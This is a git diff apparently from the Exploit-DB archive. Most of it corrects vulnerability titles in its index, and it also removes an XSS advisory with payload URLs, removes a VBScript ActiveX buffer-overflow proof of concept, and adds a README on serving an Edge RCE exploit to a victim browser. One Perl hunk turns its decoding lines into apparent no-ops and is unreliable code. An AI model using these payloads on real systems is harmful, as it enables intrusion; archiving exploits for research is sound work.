 15827,platforms/php/webapps/15827.txt,"Joomla! Component 'com_idoblog' - SQL Injection",2010-12-25,NOCKAR1111,php,webapps,0
@ -24563,7 +24563,7 @@ id,file,description,date,author,platform,type,port
 16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic - Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0
 16961,platforms/php/webapps/16961.py,"N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0
 16962,platforms/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps,0
-16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 - MultipleRemote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0
+16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 - Multiple Remote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0
 16968,platforms/php/webapps/16968.txt,"Cover Vision - SQL Injection",2011-03-13,Egyptian.H4x0rz,php,webapps,0
 16969,platforms/php/webapps/16969.txt,"Log1 CMS 2.0 - Multiple Vulnerabilities",2011-03-14,Aodrulez,php,webapps,0
 16975,platforms/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps,0
@ -24706,7 +24706,7 @@ id,file,description,date,author,platform,type,port
 17296,platforms/php/webapps/17296.txt,"NoticeBoardPro 1.0 - Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",php,webapps,0
 17297,platforms/php/webapps/17297.txt,"Jcow 4.2.1 - Local File Inclusion",2011-05-16,"AutoSec Tools",php,webapps,0
 17299,platforms/php/webapps/17299.txt,"WordPress Plugin Is-human 1.4.2 - Remote Command Execution",2011-05-17,neworder,php,webapps,0
-17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0
+17301,platforms/php/webapps/17301.txt,"Pligg CMS 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0
 17303,platforms/php/webapps/17303.txt,"Joomla! Component 'com_jdownloads' 1.0 - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
 17307,platforms/php/webapps/17307.txt,"Ultimate PHP Board 2.2.7 - Broken Authentication and Session Management",2011-05-20,i2sec,php,webapps,0
 17308,platforms/php/webapps/17308.txt,"Zen Cart 1.3.9h - Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",php,webapps,0
@ -25043,11 +25043,11 @@ id,file,description,date,author,platform,type,port
 18013,platforms/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Persistent Cross-Site Scripting",2011-10-20,loneferret,windows,webapps,0
 18018,platforms/php/webapps/18018.php,"SportsPHool 1.0 - Remote File Inclusion",2011-10-21,cr4wl3r,php,webapps,0
 18020,platforms/php/webapps/18020.txt,"Jara 1.6 - SQL Injection",2011-10-23,muuratsalo,php,webapps,0
-18021,platforms/php/webapps/18021.php,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (1)",2011-10-23,EgiX,php,webapps,0
+18021,platforms/php/webapps/18021.php,"phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (1)",2011-10-23,EgiX,php,webapps,0
 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - Cross-Site Request Forgery (Add Admin)",2011-10-23,"EjRaM HaCkEr",php,webapps,0
 18042,platforms/php/webapps/18042.txt,"Joomla! Component Techfolio 1.0 - SQL Injection",2011-10-28,"Chris Russell",php,webapps,0
 18046,platforms/php/webapps/18046.txt,"Joomla! Component Barter Sites 1.3 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
-18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (Metasploit) (2)",2011-10-25,Metasploit,php,webapps,0
+18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (Metasploit) (2)",2011-10-25,Metasploit,php,webapps,0
 18032,platforms/windows/webapps/18032.rb,"SAP Management Console - OSExecute Payload Execution (Metasploit)",2011-10-24,Metasploit,windows,webapps,0
 18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,php,webapps,0
 18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 (build 11944) - Multiple Vulnerabilities",2011-10-27,EgiX,php,webapps,0
@ -26192,8 +26192,8 @@ id,file,description,date,author,platform,type,port
 22599,platforms/php/webapps/22599.html,"vBulletin 3.0 - Private Message HTML Injection",2003-05-14,"Ferruh Mavituna",php,webapps,0
 22600,platforms/php/webapps/22600.txt,"Owl Intranet Engine 0.7 - Authentication Bypass",2003-05-14,cdowns,php,webapps,0
 22603,platforms/php/webapps/22603.txt,"PHP-Proxima - autohtml.php Information Disclosure",2003-05-14,"Mind Warper",php,webapps,0
-22605,platforms/php/webapps/22605.txt,"OneOrZero Helpdesk 1.4 - TUpdate.php SQL Injection",2003-05-15,frog,php,webapps,0
-22606,platforms/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 - install.php Administrative Access",2003-05-15,frog,php,webapps,0
+22605,platforms/php/webapps/22605.txt,"OneOrZero Helpdesk 1.4 - 'TUpdate.php' SQL Injection",2003-05-15,frog,php,webapps,0
+22606,platforms/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 - 'install.php' Administrative Access",2003-05-15,frog,php,webapps,0
 22607,platforms/php/webapps/22607.txt,"EZ Publish 2.2 - 'index.php' IMG Tag Cross-Site Scripting",2003-05-16,"Ferruh Mavituna",php,webapps,0
 22612,platforms/php/webapps/22612.txt,"ttCMS 2.2/2.3 - header.php Remote File Inclusion",2003-05-17,ScriptSlave@gmx.net,php,webapps,0
 22618,platforms/php/webapps/22618.txt,"ttCMS 2.2/2.3 / ttForum 1.1 - 'index.php' Instant-Messages Preferences SQL Injection",2003-05-20,ScriptSlave@gmx.net,php,webapps,0
@ -28091,7 +28091,7 @@ id,file,description,date,author,platform,type,port
 26207,platforms/php/webapps/26207.txt,"Land Down Under 700/701/800/801 - list.php Multiple Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0
 26208,platforms/php/webapps/26208.txt,"Autolinks 2.1 Pro - Al_initialize.php Remote File Inclusion",2005-08-29,4Degrees,php,webapps,0
 26209,platforms/php/webapps/26209.txt,"PHP-Fusion 4.0/5.0/6.0 - BBCode URL Tag Script Injection",2005-08-29,slacker4ever_1,php,webapps,0
-26211,platforms/php/webapps/26211.txt,"phpLDAPadmin 0.9.6/0.9.7 - welcome.php custom_welcome_page Variable Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0
+26211,platforms/php/webapps/26211.txt,"phpLDAPadmin 0.9.6/0.9.7 - 'welcome.php' Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0
 26212,platforms/php/webapps/26212.txt,"FlatNuke 2.5.6 - ID Parameter Directory Traversal",2005-08-31,rgod,php,webapps,0
 26213,platforms/php/webapps/26213.txt,"LibrettoCMS 2.2.2 - Arbitrary File Upload",2013-06-14,"CWH Underground",php,webapps,0
 26215,platforms/php/webapps/26215.txt,"FlatNuke 2.5.6 - USR Parameter Cross-Site Scripting",2005-08-31,rgod,php,webapps,0
@ -29251,12 +29251,12 @@ id,file,description,date,author,platform,type,port
 27711,platforms/php/webapps/27711.txt,"ThWboard 3.0 - 'index.php' Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",php,webapps,0
 27712,platforms/cgi/webapps/27712.txt,"Portal Pack 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps,0
 27713,platforms/php/webapps/27713.txt,"Manic Web MWGuest 2.1 - MWguest.php HTML Injection",2006-04-20,"Aliaksandr Hartsuyeu",php,webapps,0
-27717,platforms/php/webapps/27717.txt,"phpLDAPadmin 0.9.8 - compare_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
-27718,platforms/php/webapps/27718.txt,"phpLDAPadmin 0.9.8 - copy_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
-27719,platforms/php/webapps/27719.txt,"phpLDAPadmin 0.9.8 - rename_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
+27717,platforms/php/webapps/27717.txt,"phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
+27718,platforms/php/webapps/27718.txt,"phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
+27719,platforms/php/webapps/27719.txt,"phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
 33404,platforms/php/webapps/33404.txt,"phpFaber CMS 1.3.36 - 'module.php' Cross-Site Scripting",2009-12-14,bi0,php,webapps,0
-27721,platforms/php/webapps/27721.txt,"phpLDAPadmin 0.9.8 - search.php scope Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
-27722,platforms/php/webapps/27722.txt,"phpLDAPadmin 0.9.8 - template_engine.php Multiple Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
+27721,platforms/php/webapps/27721.txt,"phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
+27722,platforms/php/webapps/27722.txt,"phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0
 27724,platforms/php/webapps/27724.txt,"Scry Gallery - Directory Traversal",2006-04-21,"Morocco Security Team",php,webapps,0
 27725,platforms/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps,0
 27726,platforms/php/webapps/27726.txt,"Simplog 0.9.3 - ImageList.php Cross-Site Scripting",2006-04-22,nukedx,php,webapps,0
@ -30943,7 +30943,7 @@ id,file,description,date,author,platform,type,port
 30084,platforms/php/webapps/30084.php,"WordPress Plugin page-flip-image-gallery - Arbitrary File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0
 30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 - 'index.php' Cross-Site Scripting",2007-05-25,newbinaryfile,php,webapps,0
 30087,platforms/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0
-30088,platforms/php/webapps/30088.txt,"Pligg 9.5 - Reset Forgotten Password Security Bypass",2007-05-25,"242th section",php,webapps,0
+30088,platforms/php/webapps/30088.txt,"Pligg CMS 9.5 - Reset Forgotten Password Security Bypass",2007-05-25,"242th section",php,webapps,0
 30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 - news.php SQL Injection",2007-05-28,"Jesper Jurcenoks",php,webapps,0
 30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 - demo/pop3/error.php selected_theme Parameter Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps,0
 30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Variable Full Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0
@ -31322,7 +31322,7 @@ id,file,description,date,author,platform,type,port
 30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0
 30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection",2007-11-17,"Aria-Security Team",asp,webapps,0
 30777,platforms/cgi/webapps/30777.txt,"Citrix Netscaler 8.0 build 47.8 - Generic_API_Call.pl Cross-Site Scripting",2007-11-19,nnposter,cgi,webapps,0
-30778,platforms/asp/webapps/30778.txt,"Click&BaneX - Details.asp SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0
+30778,platforms/asp/webapps/30778.txt,"Click&BaneX - 'Details.asp' SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0
 30975,platforms/cgi/webapps/30975.txt,"W3-mSQL - Error Page Cross-Site Scripting",2008-01-03,vivek_infosec,cgi,webapps,0
 30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'search.php' Multiple Unspecified SQL Injection",2008-01-03,The:Paradox,php,webapps,0
 30977,platforms/php/webapps/30977.txt,"WordPress 2.2.3 - 'wp-admin/post.php' popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0
@ -31919,7 +31919,7 @@ id,file,description,date,author,platform,type,port
 31724,platforms/php/webapps/31724.txt,"Alumni 1.0.8/1.0.9 - 'index.php' year Parameter Cross-Site Scripting",2008-05-02,hadihadi,php,webapps,0
 31725,platforms/php/webapps/31725.txt,"Zen Cart 2008 - 'index.php' keyword Parameter SQL Injection",2008-05-02,"Ivan Sanchez",php,webapps,0
 31726,platforms/php/webapps/31726.txt,"Zen Cart 2008 - 'index.php' keyword Parameter Cross-Site Scripting",2008-05-02,"Ivan Sanchez",php,webapps,0
-31727,platforms/php/webapps/31727.txt,"ChiCoMaS 2.0.4 - 'index.php' Cross-Site Scripting",2008-05-02,"Hadi Kiamarsi",php,webapps,0
+31727,platforms/php/webapps/31727.txt,"Chicomas 2.0.4 - 'index.php' Cross-Site Scripting",2008-05-02,"Hadi Kiamarsi",php,webapps,0
 31729,platforms/php/webapps/31729.pl,"SiteXS CMS 0.1.1 - 'upload.php' Arbitrary File Upload",2008-05-03,"Hadi Kiamarsi",php,webapps,0
 31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL - PHP/prenom.php Multiple Parameter Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps,0
 31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL - PHP/index.php nom_branche Parameter Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps,0
@ -32194,7 +32194,7 @@ id,file,description,date,author,platform,type,port
 32139,platforms/php/webapps/32139.txt,"freeForum 1.7 - 'acuparam' Parameter Cross-Site Scripting",2008-08-01,ahmadbady,php,webapps,0
 32140,platforms/php/webapps/32140.txt,"PHP-Nuke Book Catalog Module 1.0 - 'catid' Parameter SQL Injection",2008-08-01,"H4ckCity Security Team",php,webapps,0
 32141,platforms/php/webapps/32141.txt,"Homes 4 Sale - 'results.php' Cross-Site Scripting",2008-08-04,"Ghost Hacker",php,webapps,0
-32142,platforms/php/webapps/32142.php,"Pligg 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass",2008-08-02,"Micheal Brooks",php,webapps,0
+32142,platforms/php/webapps/32142.php,"Pligg CMS 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass",2008-08-02,"Micheal Brooks",php,webapps,0
 32143,platforms/php/webapps/32143.txt,"Keld PHP-MySQL News Script 0.7.1 - 'login.php' SQL Injection",2008-08-04,crimsoN_Loyd9,php,webapps,0
 32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
 32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'week.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
@ -33270,7 +33270,7 @@ id,file,description,date,author,platform,type,port
 34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 - Session Handling Remote Security Bypass / Remote File Inclusion",2010-06-03,"High-Tech Bridge SA",php,webapps,0
 34110,platforms/php/webapps/34110.txt,"PG Auto Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0
 34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0
-34339,platforms/php/webapps/34339.txt,"Pligg 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0
+34339,platforms/php/webapps/34339.txt,"Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0
 34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database And Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0
 34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)",2014-07-21,"Brandon Perry",linux,webapps,80
 34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,php,webapps,0
@ -33281,7 +33281,7 @@ id,file,description,date,author,platform,type,port
 34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0
 34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",multiple,webapps,0
 34166,platforms/php/webapps/34166.txt,"KubeSupport - 'lang' Parameter SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
-34168,platforms/php/webapps/34168.py,"Pligg 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80
+34168,platforms/php/webapps/34168.py,"Pligg CMS 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80
 34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent Cross-Site Scripting",2014-07-27,"Osanda Malith",php,webapps,0
 34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting",2014-07-27,"Mayuresh Dani",php,webapps,0
 34173,platforms/php/webapps/34173.txt,"DirPHP 1.0 - Local File Inclusion",2014-07-27,"black hat",php,webapps,0
@ -35085,11 +35085,10 @@ id,file,description,date,author,platform,type,port
 36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin 4.4.5 - Cross-Site Request Forgery (Add User)",2015-05-11,hyp3rlinx,php,webapps,0
 36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Directory Traversal",2015-05-11,hyp3rlinx,php,webapps,0
 36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 - 'index.php' Cross-Site Scripting",2012-03-21,"Stefan Schurtz",php,webapps,0
-36998,platforms/php/webapps/36998.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0
 36999,platforms/php/webapps/36999.txt,"Open Journal Systems (OJS) 2.3.6 - 'index.php' authors[][url] Parameter Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0
 37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml() Method Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0
 37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0
-37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0
+37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - 'rfiles.php' Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0
 37003,platforms/php/webapps/37003.txt,"WordPress Plugin Booking Calendar Contact Form 1.0.2 - Multiple Vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0
 37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - (deletetopics.php) SQL Injection",2015-05-13,Wadeek,php,webapps,0
 37008,platforms/php/webapps/37008.txt,"Event Calendar PHP - 'cal_year' Parameter Cross-Site Scripting",2012-03-24,3spi0n,php,webapps,0
@ -35116,7 +35115,7 @@ id,file,description,date,author,platform,type,port
 37031,platforms/java/webapps/37031.txt,"ManageEngine Firewall Analyzer 7.2 - fw/mindex.do url Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0
 37032,platforms/java/webapps/37032.txt,"ManageEngine Firewall Analyzer 7.2 - fw/syslogViewer.do port Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0
 37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Parameter Cross-Site Scripting",2012-04-02,"Dawid Golak",java,webapps,0
-37034,platforms/php/webapps/37034.txt,"FlatnuX CMS - controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0
+37034,platforms/php/webapps/37034.txt,"FlatnuX CMS - Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0
 37035,platforms/php/webapps/37035.html,"FlatnuX CMS - Cross-Site Request Forgery (Add Admin)",2012-04-01,"Vulnerability Laboratory",php,webapps,0
 37038,platforms/php/webapps/37038.txt,"osCMax 2.5 - admin/login.php 'Username' Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0
 37039,platforms/php/webapps/37039.txt,"osCMax 2.5 - admin/htaccess.php Multiple Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0
@ -36935,4 +36934,4 @@ id,file,description,date,author,platform,type,port
 40979,platforms/php/webapps/40979.php,"Zend Framework / zend-mail < 2.4.11 - Remote Code Execution",2016-12-30,"Dawid Golunski",php,webapps,0
 40982,platforms/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",hardware,webapps,0
 40986,platforms/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps,0
-40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence Jira 5.9.12 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0
+40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence 5.9.12 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0
--- a/platforms/php/webapps/36998.txt
+++ b/platforms/php/webapps/36998.txt
@ -1,15 +0,0 @@
-source: http://www.securityfocus.com/bid/52666/info
-
-Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
-
-1. An arbitrary-file-deletion vulnerability
-2. A security vulnerability
-3. An arbitrary-file-upload vulnerability
-4. Multiple cross-site scripting vulnerabilities
-
-An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
-
-Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected. 
-
-http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php?editor=z&callb ack=x;};};alert%2834%29;{{&lang=en
-http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugin s/ibrowser/ibrowser.php?editor=%27%29;};};alert%2834%29;{{a=x%28%27&callback=iBrowser_callback&a mp;lang=en
--- a/platforms/php/webapps/6172.pl
+++ b/platforms/php/webapps/6172.pl
@ -111,10 +111,10 @@ else
 	if ( $data->content =~ /<textarea(.*)>(.*)<\/textarea>/is )
 	{
 		$temp = $2;
-		$temp =~ s/&gt;/>/ig;
-		$temp =~ s/&lt;/</ig;
-		$temp =~ s/&quot;/"/ig;
-		$temp =~ s/&amp;/&/ig;
+		$temp =~ s/>/>/ig;
+		$temp =~ s/</</ig;
+		$temp =~ s/"/"/ig;
+		$temp =~ s/&/&/ig;

 		print "[+] Got template data ...\n";
 	}
--- a/platforms/windows/remote/32661.html
+++ b/platforms/windows/remote/32661.html
@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/32814/info
-
-Evans FTP ActiveX control is prone to multiple remote buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
-
-Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions. 
-
-<HTML> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD' id='beard' /> <HEAD> <TITLE>EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC</TITLE> </HEAD> <BODY> [+] Application : EvansFTP ActiveX <br> [+] CompanyName : Evans Programming <br> [+] Description : Multi-threaded asynchronus Active-X FTP Control<br> [+] Lib GUID : {DA3C77F4-8701-11D4-908B-00010268221D}<br> [+] Exploit : Remote BoF (PoC)<br> [+] Author : Bl@ckbe@rD // Blackbeard-sql{a.t}Hotmail{dot}fr<br><br> [+] Object Safety Report :<br> Report for Clsid: {7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD}<br> RegKey Safe for Script: Faux<br> RegKey Safe for Init: Faux<br> Implements IObjectSafety: Vrai<br> IDisp Safe: Safe for untrusted: caller,data <br> IPStorage Safe: Safe for untrusted: caller,data <br><br> RegKey Safe for Script: Faux<br> RegkeySafe for Init: Faux<br> KillBitSet: Faux<br> <br><br> The Proprieties (RemoteAddress,ProxyPrefix,ProxyName,Password,ProxyBypassList,LoginName,CurrentDirectory) suffers from Buffer Overflow when we pass long strings in fact : <br> 1- RemoteAddress suffers from a BoF when we pass a string over 2068 <br> 2- ProxyPrefix suffers from a BoF when we pass a string over 1044 <br> 3- ProxyName suffers from a BoF when we pass a string over 1044 <br> 4- Password suffers from a BoF when we pass a string over 1044 <br> 5- ProxyBypassList suffers from a BoF when we pass a string over 1044 <br> 6- LoginName suffers from a BoF when we pass a string over 1044 <br> 7- CurrentDirectory suffers from a BoF when we pass a string over 1044 <br><br> DisASM RemoteAddress Crash :<br><pre> 7C809EEC MOV AL,[EDX] (KERNEL32.dll) 7C809ED4 TEST EDX,EDX 7C809ED6 JE 7C80C858 7C809EDC LEA EDI,[EDX+EAX-1] 7C809EE0 CMP EDI,EDX 7C809EE2 JB 7C80C858 7C809EE8 AND DWORD PTR [EBP-4],0 7C809EEC MOV AL,[EDX] <--- CRASH EBP+8 FEEEFEEE Stack Dump: 13FC18 A7 F3 01 66 EE FE EE FE 04 00 00 00 02 00 00 00 </pre> <script language='vbscript'> Sub RemoteAddress arg1=String(2068, "A") beard.RemoteAddress = arg1 End Sub Sub ProxyPrefix arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub ProxyName arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub Password arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub ProxyBypassList arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub LoginName arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub CurrentDirectory arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub </script><br><br> <INPUT TYPE="button" VALUE="RemoteAddress PoC" ONCLICK=RemoteAddress()> <INPUT TYPE="button" VALUE="ProxyPrefix PoC" ONCLICK=ProxyPrefix()> <INPUT TYPE="button" VALUE="ProxyName PoC" ONCLICK=ProxyName()> <INPUT TYPE="button" VALUE="Password PoC" ONCLICK=Password()> <INPUT TYPE="button" VALUE="ProxyBypassList PoC" ONCLICK=ProxyBypassList()> <INPUT TYPE="button" VALUE="LoginName PoC" ONCLICK=LoginName()> <INPUT TYPE="button" VALUE="CurrentDirectory PoC" ONCLICK=CurrentDirectory()><br><br> Brought to You by Bl@ckbe@rD<br> Peace xD </BODY> </HTML> 
--- a/platforms/windows/remote/40990.txt
+++ b/platforms/windows/remote/40990.txt
@ -0,0 +1,20 @@
+Source: https://github.com/theori-io/chakra-2016-11
+
+Proofs of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40990.zip
+
+
+chakra.dll Info Leak + Type Confusion for RCE
+
+Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201)
+
+Tested on Windows 10 Edge (modern.ie stable).
+
+FillFromPrototypes_TypeConfusion.html: WinExec notepad.exe
+
+FillFromPrototypes_TypeConfusion_NoSC.html: 0xcc (INT 3)
+
+To run:
+
+Download exploit/FillFromPrototypes_TypeConfusion.html to a directory.
+Serve the directory using a webserver (or python's simple HTTP server).
+Browse with a victim IE to FillFromPrototypes_TypeConfusion.html.